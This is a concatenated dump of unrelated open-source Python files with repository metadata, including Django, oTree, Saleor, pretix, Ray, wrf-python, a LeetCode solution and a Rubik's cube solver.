a = tf.constant([[1.0,2.0],[1.0,2.0],[1.0,2.0]])
res = tf.nn.sigmoid(a)
init_opt = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init_opt)
result = sess.run(res)
print(result)
|
[
"kkoolerter@gmail.com"
] |
kkoolerter@gmail.com
|
3fbe1bceff869e837fbf8bc1c9ada9178969a38c
|
e7d791d3f24076cad781b963ed4375cace3ba734
|
/examples/dataloader_test.py
|
fac7ec386d4585dafd320a52387fd369c2cf7a49
|
[
"Apache-2.0"
] |
permissive
|
jiniaoxu/bi-lstm-crf
|
d9512cc524f8a5d60509391d3eb0e931d299b230
|
0667537207b8cb43b68fe5ab4378f770d05bf45a
|
refs/heads/master
| 2020-04-13T18:06:51.797880
| 2018-12-24T08:12:44
| 2018-12-24T08:12:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
from dltokenizer.data_loader import DataLoader
if __name__ == '__main__':
data_loader = DataLoader("../data/src_dict.json", "../data/tgt_dict.json", batch_size=64)
generator = data_loader.generator("../data/2014")
for _ in range(1):
sent, chunk = next(generator)
assert len(sent) == len(chunk)
print(sent.shape)
print(chunk.shape)
|
[
"1490215053@qq.com"
] |
1490215053@qq.com
|
02701604a58c249a1488f5470f94671ab4bf44ad
|
15b801de0dd019411135aad75f7cd653061489d3
|
/actions/migrations/0001_initial.py
|
d0c21952f659882959d85157b7158114b4c98957
|
[] |
no_license
|
007vict/bookmarksbyexample
|
ff73befa059de10cd4b425b615678ac0fd1fa528
|
6b614affe46ebc2ac0687ed5cdf50c6439784932
|
refs/heads/master
| 2020-04-29T16:59:37.434190
| 2019-03-22T21:29:27
| 2019-03-22T21:29:27
| 176,282,231
| 0
| 0
| null | 2019-03-18T19:15:24
| 2019-03-18T12:38:50
|
Python
|
UTF-8
|
Python
| false
| false
| 1,262
|
py
|
# Generated by Django 2.2rc1 on 2019-03-22 15:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Actions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('verb', models.CharField(max_length=255)),
('target_id', models.PositiveIntegerField(blank=True, db_index=True, null=True)),
('created', models.DateTimeField(auto_now_add=True, db_index=True)),
('target_ct', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='target_obj', to='contenttypes.ContentType')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='actions', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-created',),
},
),
]
|
[
"super_vg@bk.ru"
] |
super_vg@bk.ru
|
e0bb05f7819d66e7ae57c40d5566afcc54aeedac
|
e4920c4fe4290bde524e0c141189f80fddfe44b7
|
/dashboard/urls.py
|
524c5746de8285b0cc666f48b3c5563297731e11
|
[] |
no_license
|
ShahadatShuvo/Django_portfolio
|
42af2b0aa686bff08730cdb105f95d6b63adb620
|
795ed7cbb6444245af08582ea63f57a0f32679a0
|
refs/heads/master
| 2023-05-30T01:43:50.409584
| 2021-06-14T08:29:18
| 2021-06-14T08:29:18
| 376,372,632
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 925
|
py
|
from django.urls import path
from django.contrib.auth.views import LogoutView
from .views import (
dashboard,
profile,
profile_edit,
messages,
messages_api,
projects,
projects_api,
LoginView,
EducationView,
)
app_name = 'dashboard'
urlpatterns = [
path('', dashboard, name='dashboard'),
path('profile/', profile, name='profile'),
path('profile/edit/', profile_edit, name='profile_edit'),
path('messages', messages, name='messages'),
path('messages/api/', messages_api, name='messages_api'),
path('projects', projects, name='projects'),
path('projects/api/', projects_api, name='projects_api'),
path('education/', EducationView.as_view(), name='education'),
# path('education/', EducationView.as_view(), name='one_education'),
path('login/', LoginView.as_view(), name='login'),
path('logout/', LogoutView.as_view(), name='logout'),
]
|
[
"shahadat@baiust.edu.bd"
] |
shahadat@baiust.edu.bd
|
b8aa7c0fbbbc85ced858cb68b0a50f1132f1d81e
|
f6fee9397e858bce2d2e4258602d4a029b9a859e
|
/LinkedList/Leetcode 2. Add Two Numbers.py
|
1e00848552ec84c31c195e4f04828dcbc7479c86
|
[
"MIT"
] |
permissive
|
sriharsha004/LeetCode
|
e180dc4c0e1af217d3fbe026650b4035c50a388b
|
95ca845e40c7c9f8ba589a45332791d5bbf49bbf
|
refs/heads/master
| 2022-12-07T11:37:28.843751
| 2020-08-21T03:05:45
| 2020-08-21T03:05:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 572
|
py
|
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
dummy = ListNode(0)
cur = dummy
carry = 0
while l1 or l2:
sums = 0
if l1:
sums += l1.val
l1 = l1.next
if l2:
sums += l2.val
l2 = l2.next
sums += carry
cur.next = ListNode(sums%10)
cur = cur.next
carry = sums//10
if carry:
cur.next = ListNode(carry)
return dummy.next
|
[
"Tian.Zeng@aexp.com"
] |
Tian.Zeng@aexp.com
|
f57f7a2a1489715fa67b8cc3ca5912999c0b2b63
|
0f41b3564b08045f56b8ee4743ef8834b88a274e
|
/otree/management/commands/resetdb.py
|
b7de7fb73d101b0efdeaccd536b8a8f86fc9d5d5
|
[
"MIT"
] |
permissive
|
bjgoode/otree-core
|
b04911f00671ef6bbfeeb184359133f85ec221cb
|
ab6bbcbdb53cb1d74b205f04f16eb40ea099a45d
|
refs/heads/master
| 2021-05-11T18:31:00.398740
| 2018-01-17T23:28:22
| 2018-01-17T23:28:22
| 117,827,105
| 1
| 0
| null | 2018-01-17T11:27:21
| 2018-01-17T11:27:21
| null |
UTF-8
|
Python
| false
| false
| 6,623
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# IMPORTS
# =============================================================================
import logging
from django.conf import settings
from django.core.management.base import BaseCommand
from django.core.management import call_command
from django.db import connections, transaction
from django.db.migrations.loader import MigrationLoader
from django.db.migrations.autodetector import MigrationAutodetector
import six
from unittest import mock
# =============================================================================
# LOGGER
# =============================================================================
logger = logging.getLogger('otree')
def drop_tables_command(db_engine):
if 'sqlite3' in db_engine:
return 'DROP TABLE {table};'
if 'oracle' in db_engine:
return 'DROP TABLE "{table}" CASCADE CONSTRAINTS;'
if 'postgres' in db_engine:
return 'DROP TABLE "{table}" CASCADE;'
if 'mysql' in db_engine:
return (
'SET FOREIGN_KEY_CHECKS = 0;'
'DROP TABLE {table} CASCADE;'
'SET FOREIGN_KEY_CHECKS = 1;')
raise ValueError(
'resetdb command does not recognize DB engine "{}"'.format(db_engine))
class Command(BaseCommand):
help = (
"Resets your development database to a fresh state. "
"All data will be deleted.")
def add_arguments(self, parser):
ahelp = (
'Tells the resetdb command to NOT prompt the user for '
'input of any kind.')
parser.add_argument(
'--noinput', action='store_false', dest='interactive',
default=True, help=ahelp)
def _confirm(self):
self.stdout.write(
"This will delete and recreate your database. ")
answer = six.moves.input("Proceed? (y or n): ")
if answer:
return answer[0].lower() == 'y'
return False
def _drop_table_stmt(self, dbconf):
engine = dbconf["ENGINE"]
return drop_tables_command(engine)
def _get_tables(self, db):
tables = []
out = six.StringIO()
call_command('inspectdb', database=db, no_color=True, stdout=out)
for line in out.getvalue().splitlines():
line = line.strip()
if line.startswith("db_table = '"):
tablename = line.replace(
"db_table = '", "", 1).replace("'", "").strip()
tables.append(tablename)
return tuple(reversed(tables))
def _drop_tables(self, tables, db, dt_stmt):
with connections[db].cursor() as cursor:
for table in tables:
stmt = dt_stmt.format(table=table)
cursor.execute(stmt)
def handle(self, **options):
if options.pop("interactive") and not self._confirm():
self.stdout.write('Canceled.')
return
for db, dbconf in six.iteritems(settings.DATABASES):
db_engine = dbconf['ENGINE']
if 'postgresql' in db_engine.lower():
db_engine = 'PostgreSQL'
elif 'sqlite' in db_engine.lower():
db_engine = 'SQLite'
elif 'mysql' in db_engine.lower():
db_engine = 'MySQL'
logger.info("Database engine: {}".format(db_engine))
dt_stmt = self._drop_table_stmt(dbconf)
logger.info("Retrieving Existing Tables...")
tables = self._get_tables(db)
logger.info("Dropping Tables...")
# use a transaction to prevent the DB from getting in an erroneous
# state, which can result in a different error message when resetdb
# is run again, making the original error hard to trace.
with transaction.atomic(
using=connections[db].alias,
savepoint=connections[db].features.can_rollback_ddl
):
self._drop_tables(tables, db, dt_stmt)
logger.info("Creating Database '{}'...".format(db))
self.syncdb(db, options)
# second call to 'migrate', simply to
# fake migrations so that runserver doesn't complain
# about unapplied migrations
# note: In 1.9, will need to pass --run-syncdb flag
call_command(
'migrate', database=db, fake=True,
interactive=False, **options)
# mention the word 'columns' here, so people make the connection
# between columns and resetdb, so that when they get a 'no such column'
# error, they know how to fix it.
# (An alternative is to generically catch "no such column" errors,
# but I recall that this was difficult - because there were many
# code paths or exception classes. Could re-investigate.)
logger.info('Created new tables and columns.')
@mock.patch.object(
MigrationLoader, 'migrations_module',
return_value='migrations nonexistent hack')
@mock.patch.object(
MigrationAutodetector, 'changes', return_value=False)
def syncdb(self, db, options, *mocked_args):
'''
patch .migrations_module() to return a nonexistent module,
instead of app_name.migrations.
because this module is not found,
migration system will assume the app has no migrations,
and run syncdb instead.
Hack so that migrate can't find migrations files
this way, syncdb will be run instead of migrate.
This is preferable because
users who are used to running "otree resetdb"
may not know how to run 'otree makemigrations'.
This means their migration files will not be up to date,
ergo migrate will create tables with an outdated schema.
after the majority of oTree users have this new version
of resetdb, we can add a migrations/ folder to each app
in the sample games and the app template,
and deprecate resetdb
and instead use "otree makemigrations" and "otree migrate".
also, syncdb is faster than migrate, and there is no
advantage to migrate since it's being run on a newly
created DB anyway.
also patch MigrationAutodetector.changes() to suppress the warning
"Your models have changes that are not yet reflected in a migration..."
'''
call_command(
'migrate', database=db,
interactive=False, **options)
|
[
"chris@otree.org"
] |
chris@otree.org
|
8aa639aff98132e95e43aa967b1655b5351b5783
|
880d9cc2704f7de649ad4455dd7ec2806b6a9e95
|
/PythonExam/北京理工大学Python语言程序设计-Book/Chapter6/e10.3CalThreeKingdoms.py
|
7dfc8f674c32c92b48171bf8ba1a75ce241cab31
|
[] |
no_license
|
shunz/Python-100-Days_Practice
|
14795757effcff50a4644f57c5c109fa1c9c38ac
|
82f508ff6911ce3aa5c5a69cd481a6cc87f02258
|
refs/heads/master
| 2020-12-26T18:52:32.755384
| 2020-04-07T15:49:36
| 2020-04-07T15:49:36
| 237,604,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,784
|
py
|
"""《三国演义》人物出场统计
- 输入
- 从网上找到三国演义全文,保存为threekingdoms.txt
- 处理
1. 分解并提取中文文章的单词
- 采用jieba对文章分词
- 排除不是人物的单词,用集合类型构建一个排除词汇库
- 合并同人不同名的单词,比如:刘备=刘玄德=玄德=刘皇叔=主公
2. 对每个单词进行计数
- 将单词保存在变量word中
- 使用一个字典类型counts={}
- counts[word] = counts.get(word, 0) + 1 # 新词加入字典,计为1;旧词累加出现次数
3. 对单词的统计值从高到低进行排序
- 由于字典类型没有顺序,需要转换为列表类型,然后使用sort()和lambda函数配合实现根据单词出现的次数对元素进行排序
- 输出
- 输出前10个高频词语,并格式化打印输出
"""
import jieba
excludes = {'却说','将军','二人','不可','荆州','不能','商议','如此','如何','军士','左右','军马','引兵','次日',\
'大喜','天下','东吴','于是'}
txt = open('threekingdoms.txt', 'r').read().lower()
words = jieba.lcut(txt)
counts = {}
for w in words:
if w not in excludes and len(w) != 1:
if w in ['诸葛亮', '孔明曰']:
w = '孔明'
elif w in ['关公', '云长']:
w = '关羽'
elif w in ['玄德', '玄德曰']:
w = '刘备'
elif w in ['孟德', '丞相']:
w = '曹操'
counts[w] = counts.get(w, 0) + 1
items = list(counts.items())
items.sort(key=lambda x: x[1], reverse=True)
for i in range(9):
word, count = items[i]
print(f'{word:<10}{count:>5}')
|
[
"rockucn@gmail.com"
] |
rockucn@gmail.com
|
11f87053a9b778f57300d4430253f97fcf77ccc6
|
3a533d1503f9a1c767ecd3a29885add49fff4f18
|
/saleor/graphql/translations/mutations/product_translate.py
|
bfb252870e111b3c02e367b5f1d589c8e89a8ce5
|
[
"BSD-3-Clause"
] |
permissive
|
jonserna/saleor
|
0c1e4297e10e0a0ce530b5296f6b4488f524c145
|
b7d1b320e096d99567d3fa7bc4780862809d19ac
|
refs/heads/master
| 2023-06-25T17:25:17.459739
| 2023-06-19T14:05:41
| 2023-06-19T14:05:41
| 186,167,599
| 0
| 0
|
BSD-3-Clause
| 2019-12-29T15:46:40
| 2019-05-11T18:21:31
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 2,059
|
py
|
import graphene
from ....core.tracing import traced_atomic_transaction
from ....permission.enums import SitePermissions
from ....product import models as product_models
from ...channel import ChannelContext
from ...core import ResolveInfo
from ...core.enums import LanguageCodeEnum
from ...core.types import TranslationError
from ...plugins.dataloaders import get_plugin_manager_promise
from ...product.types import Product
from .utils import BaseTranslateMutation, TranslationInput
class ProductTranslate(BaseTranslateMutation):
class Arguments:
id = graphene.ID(
required=True,
description="Product ID or ProductTranslatableContent ID.",
)
language_code = graphene.Argument(
LanguageCodeEnum, required=True, description="Translation language code."
)
input = TranslationInput(required=True)
class Meta:
description = "Creates/updates translations for a product."
model = product_models.Product
object_type = Product
error_type_class = TranslationError
error_type_field = "translation_errors"
permissions = (SitePermissions.MANAGE_TRANSLATIONS,)
@classmethod
def perform_mutation( # type: ignore[override]
cls, _root, info: ResolveInfo, /, *, id, input, language_code
):
node_id = cls.clean_node_id(id)[0]
instance = cls.get_node_or_error(info, node_id, only_type=Product)
cls.validate_input(input)
manager = get_plugin_manager_promise(info.context).get()
with traced_atomic_transaction():
translation, created = instance.translations.update_or_create(
language_code=language_code, defaults=input
)
product = ChannelContext(node=instance, channel_slug=None)
if created:
cls.call_event(manager.translation_created, translation)
else:
cls.call_event(manager.translation_updated, translation)
return cls(**{cls._meta.return_field_name: product})
|
[
"noreply@github.com"
] |
jonserna.noreply@github.com
|
f792e5de0ef32f047b98b4a3d27b410d7185e5ad
|
d69bff5c124177d16074034da7b87859a4e9a525
|
/src/pretix/plugins/statistics/__init__.py
|
eb7d476351730b84ea392eb9ec1ac39e48ad3ec5
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
snadal/pretix
|
f377313d52cb57d0193c8d102af1e47f64de7ce6
|
430ccece9a3af6fd93c51626a9551ef79cee8002
|
refs/heads/master
| 2021-02-15T09:17:07.063355
| 2020-03-04T11:44:37
| 2020-03-04T11:44:37
| 244,885,007
| 0
| 0
|
NOASSERTION
| 2020-03-04T11:38:09
| 2020-03-04T11:38:09
| null |
UTF-8
|
Python
| false
| false
| 588
|
py
|
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
from pretix import __version__ as version
class StatisticsApp(AppConfig):
name = 'pretix.plugins.statistics'
verbose_name = _("Statistics")
class PretixPluginMeta:
name = _("Statistics")
author = _("the pretix team")
version = version
category = 'FEATURE'
description = _("This plugin shows you various statistics.")
def ready(self):
from . import signals # NOQA
default_app_config = 'pretix.plugins.statistics.StatisticsApp'
|
[
"mail@raphaelmichel.de"
] |
mail@raphaelmichel.de
|
f16a8c1bae7847be6dfceb67897dee835eca9958
|
907b3bbd44c95be1542a36feaadb6a71b724579f
|
/files/home/gcloud/google-cloud-sdk/lib/surface/container/builds/create.py
|
c0d1af759913e065a72a78222c6ad59bf6ef3554
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
vo0doO/com.termux
|
2d8f536c1a5dbd7a091be0baf181e51f235fb941
|
c97dd7b906e5ef3ec157581fd0bcadd3e3fc220e
|
refs/heads/master
| 2020-12-24T09:40:30.612130
| 2016-11-21T07:47:25
| 2016-11-21T07:47:25
| 73,282,539
| 2
| 2
| null | 2020-07-24T21:33:03
| 2016-11-09T12:33:01
|
Python
|
UTF-8
|
Python
| false
| false
| 919
|
py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Create build command."""
from googlecloudsdk.calliope import base
# Importing the beta version of this command to reduce repetition.
from surface.container.builds import submit
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class Create(submit.Submit):
"""Create a build using the Google Container Builder service."""
|
[
"kirsanov.bvt@gmail.com"
] |
kirsanov.bvt@gmail.com
|
eacc4ec788812a02d38d19d23aea55d3f053a2dc
|
b3699724907850fd26cbce4509fec83a33b89760
|
/python/ray/autoscaler/_private/event_summarizer.py
|
d877bf424459d75777a728931f35e79993c01ecb
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
BonsaiAI/ray
|
5e2f26a81d865a795261d11f9182aca7f07c7b97
|
941d30f082fe879ea30618af14327c25b5a21a74
|
refs/heads/master
| 2023-06-12T05:15:29.370188
| 2021-05-06T07:03:53
| 2021-05-06T07:03:53
| 233,708,687
| 3
| 5
|
Apache-2.0
| 2023-05-27T08:06:37
| 2020-01-13T22:41:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,430
|
py
|
from typing import Any, Callable, Dict, List
class EventSummarizer:
"""Utility that aggregates related log messages to reduce log spam."""
def __init__(self):
self.events_by_key: Dict[str, int] = {}
def add(self, template: str, *, quantity: Any,
aggregate: Callable[[Any, Any], Any]) -> None:
"""Add a log message, which will be combined by template.
Args:
template (str): Format string with one placeholder for quantity.
quantity (Any): Quantity to aggregate.
aggregate (func): Aggregation function used to combine the
quantities. The result is inserted into the template to
produce the final log message.
"""
# Enforce proper sentence structure.
if not template.endswith("."):
template += "."
if template in self.events_by_key:
self.events_by_key[template] = aggregate(
self.events_by_key[template], quantity)
else:
self.events_by_key[template] = quantity
def summary(self) -> List[str]:
"""Generate the aggregated log summary of all added events."""
out = []
for template, quantity in self.events_by_key.items():
out.append(template.format(quantity))
return out
def clear(self) -> None:
"""Clear the events added."""
self.events_by_key.clear()
|
[
"noreply@github.com"
] |
BonsaiAI.noreply@github.com
|
0d1c07214d02cff04c05d3e2658206175b689f11
|
166e2e2095ca86e44735d3dd85b54d3f30e03baf
|
/app/__init__.py
|
f8617206c3f0409fdb445c1498a0a463afbb73f6
|
[
"MIT"
] |
permissive
|
joss13aws/damgteam
|
e04502e7c89142a9e060a2d879cfcb9cf0d2e29a
|
ce5beedc5b187141bcec76c15011fe8c4ae33743
|
refs/heads/master
| 2022-01-25T08:22:44.387636
| 2018-09-12T07:15:39
| 2018-09-12T07:15:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 896
|
py
|
# -*- coding: utf-8 -*-
"""
Script Name: __init__.py.py
Author: Do Trinh/Jimmy - 3D artist.
Description:
"""
# -------------------------------------------------------------------------------------------------------------
from __future__ import absolute_import
import os, subprocess
BASE = os.path.dirname(__file__).split(__name__)[0]
if __name__ == '__main__':
ROOT = BASE.split('app')[0]
else:
ROOT = (os.path.dirname(__file__).split(__name__)[0])
try:
os.getenv('ROOT')
except KeyError:
subprocess.Popen('SetX {} %CD%'.format('ROOT'), shell=True).wait()
else:
if os.getenv('ROOT') != ROOT:
subprocess.Popen('SetX {} %CD%'.format('ROOT'), shell=True).wait()
# -------------------------------------------------------------------------------------------------------------
# Created by panda on 24/08/2018 - 1:28 AM
# © 2017 - 2018 DAMGteam. All rights reserved
|
[
"dot@damgteam.com"
] |
dot@damgteam.com
|
fa4720480d99598478d88893f74730d1b74f153b
|
bfd6ac084fcc08040b94d310e6a91d5d804141de
|
/PulseSequences2/SidebandOptimization.py
|
5b3223a3788320f39d1161c1d19f3a5584fa78af
|
[] |
no_license
|
jqwang17/HaeffnerLabLattice
|
3b1cba747b8b62cada4467a4ea041119a7a68bfa
|
03d5bedf64cf63efac457f90b189daada47ff535
|
refs/heads/master
| 2020-12-07T20:23:32.251900
| 2019-11-11T19:26:41
| 2019-11-11T19:26:41
| 232,792,450
| 1
| 0
| null | 2020-01-09T11:23:28
| 2020-01-09T11:23:27
| null |
UTF-8
|
Python
| false
| false
| 2,590
|
py
|
from common.devel.bum.sequences.pulse_sequence import pulse_sequence
from labrad.units import WithUnit as U
from treedict import TreeDict
class SidebandOptimization(pulse_sequence):
scannable_params = {'SidebandCooling.sideband_cooling_amplitude_854' : [(-30., -6., 3., 'dBm'), 'current'],
'SidebandCooling.stark_shift' : [(-50.0, 50.0, 2.5, 'kHz'), 'current']}
show_params= [
'SidebandCooling.line_selection',
'SidebandCooling.sideband_cooling_amplitude_729',
'SidebandCooling.sideband_cooling_amplitude_854',
'SidebandCooling.sideband_cooling_amplitude_866',
'SidebandCooling.selection_sideband',
'SidebandCooling.order',
'SidebandCooling.stark_shift',
'SidebandCooling.cooling_cycles',
'RabiFlopping.rabi_amplitude_729',
'RabiFlopping.duration',
'RabiFlopping.line_selection',
'RabiFlopping.selection_sideband',
'RabiFlopping.order',
]
def sequence(self):
from StatePreparation import StatePreparation
from subsequences.RabiExcitation import RabiExcitation
from subsequences.StateReadout import StateReadout
from subsequences.TurnOffAll import TurnOffAll
## calculate the scan params
rf = self.parameters.RabiFlopping
freq_729=self.calc_freq(rf.line_selection , rf.selection_sideband , rf.order)
self.end = U(10., 'us')
self.addSequence(TurnOffAll)
self.addSequence(StatePreparation)
self.addSequence(RabiExcitation,{'Excitation_729.rabi_excitation_frequency': freq_729,
'Excitation_729.rabi_excitation_amplitude': rf.rabi_amplitude_729,
'Excitation_729.rabi_excitation_duration': rf.duration })
self.addSequence(StateReadout)
@classmethod
def run_initial(cls,cxn, parameters_dict):
print "Switching the 866DP to auto mode"
cxn.pulser.switch_auto('866DP')
@classmethod
def run_in_loop(cls,cxn, parameters_dict, data, x):
#print "Running in loop Rabi_floping"
pass
@classmethod
def run_finally(cls,cxn, parameters_dict, data, x):
print "switching the 866 back to ON"
cxn.pulser.switch_manual('866DP', True)
|
[
"haeffnerlab@gmail.com"
] |
haeffnerlab@gmail.com
|
abc5778f8d9954d10c526765fe14fd1b7d08ab46
|
33789ec4b4a2d35f06cd89068f90686650057102
|
/object_oriented_programming/polymorphism/function_overloading.py
|
2b41cb5df64489594b40d2cdb5f9750b69d6a1df
|
[] |
no_license
|
unnievarghese/originalpythonluminar
|
d9c342a5b34b7236bf34f8a53b35188b12e90b3d
|
616929ff471700248b0619c35025562c131ea459
|
refs/heads/master
| 2023-03-01T20:59:41.165467
| 2021-01-23T11:26:09
| 2021-01-23T11:26:09
| 315,814,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 606
|
py
|
def add():
print('inside no arg add method')
def add(num):
print('inside 1 arg add method')
def add(num1,num2):
print('inside 2 arg add method')
# def without a class is funtion
#fucntion overloading is same as method overriding but without class
# same fuction but different number of arguments
print(add(1,2)) #this one works because it has two arg and add function with two parameter works because it is
#recently implemented
print(add(1)) #this one wont work becuase it has only 1 arg and add function with 1 parameter
# is not last implemented
|
[
"unnieputhengadi9@gmail.com"
] |
unnieputhengadi9@gmail.com
|
be86e46364d706fb41a1344fe6cdb49253da255f
|
3f345ac4cad6dc931260ab40c40d0977ba51db77
|
/src/__init__.py
|
24b34714951bc77838edb3c7468a1acd0abc9a0b
|
[] |
no_license
|
fran-jo/EngineME
|
f586831f55942320a0dc07dbf70a409c2fc475d5
|
69555183d5b8a3bc3c4a0c406da2a58b2f9fcb70
|
refs/heads/master
| 2020-03-23T21:03:39.305112
| 2019-02-09T22:03:09
| 2019-02-09T22:03:09
| 142,078,920
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 179
|
py
|
from eme.logiclayer.engine import enginedym
from eme.logiclayer.engine import engineomc
from eme.logiclayer.command import CommandOMC
# from engine.engineJModelica import EngineJM
|
[
"fran_jo@hotmail.com"
] |
fran_jo@hotmail.com
|
96e4c704ecf4e1e33f84c8abce3e5307dfcb01bc
|
33294c238bd5c6ad0cb69d7b6d6922a54b1f7d95
|
/src/wrf/g_omega.py
|
f2f70ba8836d6204a9722f15fdb14897dc289f60
|
[
"Apache-2.0"
] |
permissive
|
NCAR/wrf-python
|
a3b81aa0de3c7dd8b20d390bd949e3f4e3100bed
|
79dda8329dd814aaba44cddf62cd12db0f5e2e97
|
refs/heads/develop
| 2023-06-30T03:14:14.380762
| 2023-06-16T22:26:09
| 2023-06-16T22:26:09
| 59,517,733
| 384
| 155
|
Apache-2.0
| 2023-06-23T19:43:18
| 2016-05-23T20:55:40
|
Python
|
UTF-8
|
Python
| false
| false
| 3,272
|
py
|
from __future__ import (absolute_import, division, print_function)
from .constants import Constants
from .destag import destagger
from .extension import _omega, _tk
from .util import extract_vars
from .metadecorators import copy_and_set_metadata
@copy_and_set_metadata(copy_varname="T", name="omega",
description="omega",
units="Pa s-1")
def get_omega(wrfin, timeidx=0, method="cat", squeeze=True, cache=None,
meta=True, _key=None):
"""Return Omega.
This functions extracts the necessary variables from the NetCDF file
object in order to perform the calculation.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
method (:obj:`str`, optional): The aggregation method to use for
sequences. Must be either 'cat' or 'join'.
'cat' combines the data along the Time dimension.
'join' creates a new dimension for the file index.
The default is 'cat'.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
cache (:obj:`dict`, optional): A dictionary of (varname, ndarray)
that can be used to supply pre-extracted NetCDF variables to the
computational routines. It is primarily used for internal
purposes, but can also be used to improve performance by
eliminating the need to repeatedly extract the same variables
used in multiple diagnostics calculations, particularly when using
large sequences of files.
Default is None.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
_key (:obj:`int`, optional): A caching key. This is used for internal
purposes only. Default is None.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: Omega.
If xarray is
enabled and the *meta* parameter is True, then the result will be a
:class:`xarray.DataArray` object. Otherwise, the result will be a
:class:`numpy.ndarray` object with no metadata.
"""
varnames = ("T", "P", "W", "PB", "QVAPOR")
ncvars = extract_vars(wrfin, timeidx, varnames, method, squeeze, cache,
meta=False, _key=_key)
t = ncvars["T"]
p = ncvars["P"]
w = ncvars["W"]
pb = ncvars["PB"]
qv = ncvars["QVAPOR"]
wa = destagger(w, -3)
full_t = t + Constants.T_BASE
full_p = p + pb
tk = _tk(full_p, full_t)
omega = _omega(qv, tk, wa, full_p)
return omega
|
[
"ladwig@ucar.edu"
] |
ladwig@ucar.edu
|
8f7769ef093d5beca0d0d32a1807271d4d0060da
|
761dbc29537f2271d7cac5ee55bf818cf3d94ee3
|
/solver_methods.py
|
6b2949e8036f047c4f0b16af10481ba7603d3b16
|
[] |
no_license
|
k-off/Rubik_brute_force
|
ee5d78d22ff72ecd312129787571635cd1f6d3fe
|
8688a9e66f8b2d40afe46a449a2b830c5b461e6e
|
refs/heads/master
| 2022-03-07T10:43:56.580884
| 2019-10-22T08:09:32
| 2019-10-22T08:09:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,791
|
py
|
#******************************************************************************#
# #
# :::::::: #
# solver_methods module :+: :+: #
# +:+ #
# By: pacovali <marvin@codam.nl> +#+ #
# +#+ #
# Created: 2019/01/01 00:00:00 by pacovali #+# #+# #
# Updated: 2019/01/01 00:00:00 by pacovali ######## odam.nl #
# #
#******************************************************************************#
import numpy as np
from Rubik_class import Rubik
MAX_MOVES = 20;
def compare_cubes(self) :
return (np.array_equal(self.reference.F, self.mixed.F) and
np.array_equal(self.reference.R, self.mixed.R) and
np.array_equal(self.reference.B, self.mixed.B) and
np.array_equal(self.reference.L, self.mixed.L) and
np.array_equal(self.reference.U, self.mixed.U) and
np.array_equal(self.reference.D, self.mixed.D));
exit();
def check_iterator(i, skip) :
if skip < 0 :
return (False);
if (skip % 2 == 0 and i // 3 == skip) :
return (True);
if (skip % 2 == 1 and (skip - (i // 3) == 1 and skip - (i // 3) == 0)) :
return (True);
return (False);
def try_next(self, current_move_nr, allowed, inverse, solution, skip) :
current_move_nr += 1;
i = 0;
for move in allowed :
if check_iterator(i, skip) == False:
solution = np.append(solution, move);
self.mixed.choose_rotation(move);
is_equal = compare_cubes(self);
if is_equal == True:
return (np.array([True, solution]));
if is_equal == False and current_move_nr < self.peak_moves:
result = try_next(self, current_move_nr, allowed, inverse, solution, i // 3);
if (result[0] == True):
return (result);
for inv in inverse[i]:
self.mixed.choose_rotation(inv);
solution = np.delete(solution, -1);
i += 1;
current_move_nr -= 1;
return (np.array([False, solution]));
def solve(self):
solution = np.array([]);
solved = [False, solution];
while self.peak_moves < MAX_MOVES and solved[0] == False:
self.peak_moves += 1;
solved = try_next(self, 0, self.allowed, self.inverse, solution, -1);
if (solved[0] == True):
return (solved[1]);
|
[
"user@localhost.localdomain"
] |
user@localhost.localdomain
|
76d96db4057deeca5c0be5158343d8ae8cd74e65
|
e281ce2330656a6a0a7f795f535f78881df8b5ba
|
/Web/HelloWorld/Web1.py
|
